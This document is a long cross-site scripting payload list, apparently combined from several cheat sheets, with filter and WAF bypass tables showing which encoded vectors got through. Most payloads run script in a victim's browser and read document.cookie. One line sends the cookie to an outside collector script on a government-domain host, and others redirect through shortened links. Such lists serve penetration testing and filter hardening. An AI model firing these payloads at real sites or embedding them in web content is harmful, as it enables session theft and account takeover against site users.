<audio src=x onerror=prompt(document.cookie);> "><iframe/src="javascript:alert(document.cookie)">
"><iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
"><form><button formaction=javascript:alert(document.cookie)>CLICKME</button></form>
"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTs8L3NjcmlwdD4=">
"><svg/onload=prompt(document.cookie);> "><select autofocus onfocus=alert(document.cookie)>
<textarea autofocus onfocus=alert(document.cookie)> "><keygen autofocus
onfocus=alert(document.cookie)> "><video><source onerror="javascript:alert(document.cookie)"> "><img
src=x onerror="javascript:window.onerror=alert;throw 1"> "><meta http-equiv="refresh"
content="0;url=//goo.gl/nlX0P"> "><math><a xlink:href="//goo.gl/nlX0P">click //
"><svg><script>alert(/1/)</script>
"><svg><script>varmyvar="text";alert(document.cookie)//";</script></svg> ~~~~~~~~~~~~~~
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> "><svg
onload="prompt(/0/);"></svg> "><ScRipt>alert(0)</ScRipt>
"><scr<script>ipt>alert(document.cookie)</scr<script>ipt> "><a
href=javascript:alert(document.cookie)>Clickme</a> "><body/onhashchange=alert(document.cookie)><a
href=#>clickit</a> "><img src=x onerror=prompt(/xss found by pik4chu/);> "><img src=x
onerror=prompt(document.cookie);> "><script>onmouseover=alert("xss found by pik4chu")</script>
"/></script><svg onload='-/"/-prompt(/baho kag bilat/)//' "><script>alert(String.fromCharCode(120, 115,
115, 32, 102, 111, 117, 110, 100, 32, 98, 121, 32, 112, 105, 107, 52, 99, 104, 117))</script>
"><script>alert("xss")</script> "><A HREF="http://www.google.com"><h1>xss</h1></A>
test'>';))alert('xss');function a () { function b () { var a=' <script>alert(document.coockie);</script>
<script>document.location="http://lgu-virac2010.gov.ph/cok/cok.php?c=" document.cookie</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//\";
alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>=&{} javascript:prompt(0); javascript:alert(document.domain); javascript:alert("x"); '">'"><img
src=x onmouseover=alert(document.domain) ddd=> "onmouseover=alert(document.domain) "
http://www.thisislegal.com/tutorials/19 http://ha.ckers.org/xsscalc.html
http://sage.math.washington.edu/home/wstein/www/home/agc/lit/javascript/xss.html
http://www.w3schools.com/jsref/dom_obj_document.asp
http://www.w3schools.com/jsref/dom_obj_event.asp http://excess-xss.com/<textarea onblur=alert(1)
id=x>testtest
'
%27
"
%22
\
%5C
/
%2F
<
%3C
>
%3E
<>
%3C%3E
<t>
%3Ct%3E
</script/</K/>
<script>
%2522
%252522
%25252522
%2525252522
alert(1)
javascript:alert(1)
------------------------------------------------------------------------------------------------------------------------
1. (javascript:) = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click me!#*/alert(1)
(200 OK) = <javasc onclick=location=tagName%2BinnerHTML%2Blocation.hash>ript:/*click
me!#*/alert(1)
(Error) = <object data=javascript:alert(1)>
(200 OK) = <object
data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=>
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
2. (on) = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = <img src=x onclick=alert(1)>click
(200 OK) = <math><brute href=javascript:alert(1)>click
(Error) = <x onclick=alert(1)>click
(200 OK) = <a href=javascript:alert(1)>click
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
3. (Popup) = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = <svg onload=alert(1)>
(200 OK) = <svg onload=%26emsp;pr\u006F\u006Dpt`${1}`>
(Error) = <img src=x onclick=alert(1)>
(200 OK) = <img src=x onclick=a=al\u0065rt,b=1,[b].find(a)>
(Error) = <javascript: onclick=alert(1)>click
(200 OK) = <javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash>/*click
me!#*/alert(1)
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
4. (Popup Bypassed)
-----------------------------------------------------------------------------------------------------------------------
(Error) = alert(1)
(200 OK) = {alert(1)}
(200 OK) = {/**/alert/**/(1)}
(200 OK) = +{/**/alert/**/(1)}+
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
5. (Popup Pack)
-----------------------------------------------------------------------------------------------------------------------
- alert
- prompt
- confirm
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
6. </script> = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = </script><svg onload=alert(1)>
(200 OK) = </script/*<*/*K*/*>*/**/<svg onload=alert(1)>
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
7. (Space) = Removed
-----------------------------------------------------------------------------------------------------------------------
(Error) = (Space)
(200 OK) = +
(200 OK) = /
(200 OK) = %0A
(200 OK) = %0C
(200 OK) = %0D
(200 OK) = %09
(200 OK) = /**/
(200 OK) = /(space)/
(200 OK) = (space)hello(space)world(space)
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
8. (max="32") ??
-----------------------------------------------------------------------------------------------------------------------
(Error) = <img/src=x+onerror=alert(document.domain)> = 42
(200 OK) = <x/oncut=alert(document.domain)> = 32
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
9. XSS (WAF) Bypassed ??
-----------------------------------------------------------------------------------------------------------------------
- Use </script><!-->(XSS) = </script><!--><svg onload=alert(1)>
- Use HTML Entity (Number) = &#(URL Code)
- Use HTML Entity (Number With ;) = &#(URL Code);
- Use JS Escape (Unicode) = \u00(URL Code)
- Use URL Encode = %(URL Code)
- Use Double URL Encode = %25(URL Code)
- Use Triple URL Encode = %2525(URL Code)
-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------
10. Bypassed Trick!!!
-----------------------------------------------------------------------------------------------------------------------
- <img src='">hello guyss!!!<'" onclick=alert`1`>
- <svg </onload ="1> (_=prompt,_(1)) "">
- <form><input formaction=javascript:alert(1) type=submit value=click>
- </script><!--><svg><script>alert(1)%0A-->
- <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
- '"</Script><Html /Onmouseover=(alert)(1) //
- <svg><set id=alert onbegin=id1=document.domain,top[id](id1)>
-----------------------------------------------------------------------------------------------------------------------
url=javascript://%250Aalert(document.location="https://google.com",document.location="https://
www.facebook.com")With double encode : con%2566irm%2528document%252Eco%256Fkie%2529
With HTML Code : a%26%2361confirm%26%2344b%26%2361document%26%2346co%26%23111kie
%26%2344%26%2391b%26%2393%26%2346find%26%2340a%26%2341
With JS Escape : set\u0054imeout`con\u0066irm\u0028document\u002eco\u006fkie\u0029`
setTimeout`con\x66irm\x28document\x2eco\x6fkie\x29`
No Bypassed : setTimeout`confirm\x28document\xcookie)`
Filter Firewall Bypassed : s%5Cu0065t%5Cu0054imeo%5Cu0075t%26%2396con%5Cu0066irm
%5Cu0028document%5Cu002eco%5Cu006fkie%5Cu0029%26%2396a = document.createElament("a");
a.href = "javascript:alert()"; a.protocol
javascript://:%0aalert()
javascript:alert(1)
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-
EQUIV="refresh" a="a
<script>a=top[Object.keys(top).filter((v)=>{if(/^do/.test(v))return 1})];for(i in
a)if(/ie$/.test(i))alert(a[i])</script>
<</>script></script></script/<script>alert`1`<</script>/script><script
"-alert(1)//
'-alert(1)//
"-alert(1)-"
'-alert(1)-'
";alert(1);"
';alert(1);'
";-alert(1);"
';-alert(1);'
";-alert(1);-"
';-alert(1);-'
\\";-alert(1);"
\\';-alert(1);'
";-alert(1);"//
';-alert(1);'//
\";alert(1);//
\';alert(1);//
\\";alert(1);//
\\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\\";-alert(1);//
\\';-alert(1);//
\";alert(1);//
\';alert(1);//
\";-alert(1);//
\';-alert(1);//
\";alert(1)//
\';alert(1)//
alert(1)
";alert(1); var foo="
';alert(1); var foo='
";}alert(1);function x(){//
';}alert(1);function x(){//
";}alert(1);-function x(){//
';}alert(1);-function x(){//
\"})))}catch(e){alert(1)}//
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
<iframe name=windowplz></iframe><script>windowplz.alert(1)</script>
testtest"/accesskey%3D"%26%2388;"/onclick%3D"%26%2391;1%5D.find%26lpar;alert%29
["<s ", " onmouseover='alert(1)'>", "foobar</s>"]
</script><svg><script>alert(1)%0A-->
<style>*{transition:color 1s}*:hover{color:red}</style><brute ontransitionend=confirm(1)>
<svg/on<script><script>load=alert(1)//</script>
<svg><set id=alert onbegin=top[id](1)>
<svg><script>/<@/>alert(1)</script>
<img src onerror=%26emsp;prompt`${document.domain}`>
<svg </onload ="1> (_=prompt,_(1)) "">
{` <body \< onload
=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
</ScRiPt><img src=something onauxclick="new Function `al\ert\`xss\``">
<img src=x:alert(alt) onerror=eval(src) alt=document.domain>
<--`<img/src=` onerror=confirm``> --!>
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/
self['doc'%2b'ument']['domain'];">
"><iframe/onload=ajavascript%26colon;alert%26lpar;document%26period;domain%26rpar;>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>t
<a href="j%26Tab;a%26Tab;v%26Tab;asc%26NewLine;ri%26Tab;pt%26colon;%26lpar;a%26Tab;l
%26Tab;e%26Tab;r%26Tab;t%26Tab;(document.domain)%26rpar;">X</a>
<!'/*!"/*\'/*\"/**/-top[`con\x66irm`]`1`//><svg>
">'><details/open/ontoggle=confirm(1)>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
'"</Script><Html /Onmouseover=(alert)(1) //
<svg><animate onend=alert(1) attributeName=x dur=1s>
<script>location='javascript:alert\x281\x29'</script>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))'>
<math><brute href=javascript:alert(1)>click
<math><brute xlink:href=javascript:alert(1)>click
<svg><script xlink:href=data:,alert(1) />
<form><input formaction=javascript:alert(1) type=submit value=click>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
">'><details/open/ontoggle=confirm(1)>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="></object>
-->"'/></sCript><deTailS open x%3D">" ontoggle%3Da%3Dco\u006efirm,b%3D1,[1].find(a)>
<svg </onload ="1> (_=prompt,_(1)) "">
<img src='"><'" onclick=alert`1`>
<img/src='>'<**/onclick=alert`1`//*>*/>
<script>x = '<!--<script>'</script>/-alert(1)</script>
<</div>script</div>>alert()<</div>/script</div>>
<</img>script</img>>alert()<</img>/script</img>>
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>
<iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
'><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
"><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
'/><iframe src=%22java%0Dscript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
"/><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</ScRiPt/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</TiTlE/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</TeXtArEa/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</StYlE/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</NoScRiPt/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
<body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'/><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"/><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</ScRiPt/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TiTlE/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TeXtArEa/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</StYlE/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</NoScRiPt/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
<embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'/><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"/><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</ScRiPt/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TiTlE/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TeXtArEa/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</StYlE/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</NoScRiPt/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
<object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'/><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"/><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</ScRiPt/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TiTlE/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TeXtArEa/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</StYlE/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</NoScRiPt/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>
<j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
'><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
"><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
'/><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
"/><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</ScRiPt/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</TiTlE/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</TeXtArEa/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</StYlE/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</NoScRiPt/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
<SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
'><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
"><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
'/><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
"/><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</ScRiPt/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</TiTlE/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</TeXtArEa/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</StYlE/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</NoScRiPt/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
<svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
'><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
"><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
'/><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
"/><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</ScRiPt/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</TiTlE/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</TeXtArEa/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</StYlE/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</NoScRiPt/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
<SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
'><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
"><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
'/><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
"/><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</ScRiPt/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</TiTlE/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</TeXtArEa/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</StYlE/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</NoScRiPt/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
<A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt
%29;>X
'><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt
%29;>X
"><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
'/><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
"/><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</ScRiPt/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</TiTlE/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</TeXtArEa/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</StYlE/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</NoScRiPt/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
<embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
'><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
"><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
'/><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
"/><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</ScRiPt/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</TiTlE/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</TeXtArEa/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/
charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</StYlE/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</NoScRiPt/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/
charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
<jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML
%2Blocation%26%2346;hash>/*click me!#*/alert(1)
'><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
"><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
'/><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
"/><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</ScRiPt/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</TiTlE/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</TeXtArEa/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag
%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</StYlE/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</NoScRiPt/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag
%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
'>
">
'/>
"/>
</ScRiPt/<K>
</TiTlE/<K>
</TeXtArEa/<K>
</StYlE/<K>
</NoScRiPt/<K><!-- Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload
List -->
<!-- Author : Ismail Tasdelen -->
<!-- Linkedin : https://www.linkedin.com/in/ismailtasdelen/ -->
<!-- GitHub : https://github.com/ismailtasdelen/ -->
<!-- Twitter : https://twitter.com/ismailtsdln -->
<!-- Medium : https://medium.com/@ismailtasdelen -->
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<script src=1 href=1 onerror="javascript:alert(1)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
<title onPropertyChange title
onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body
onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
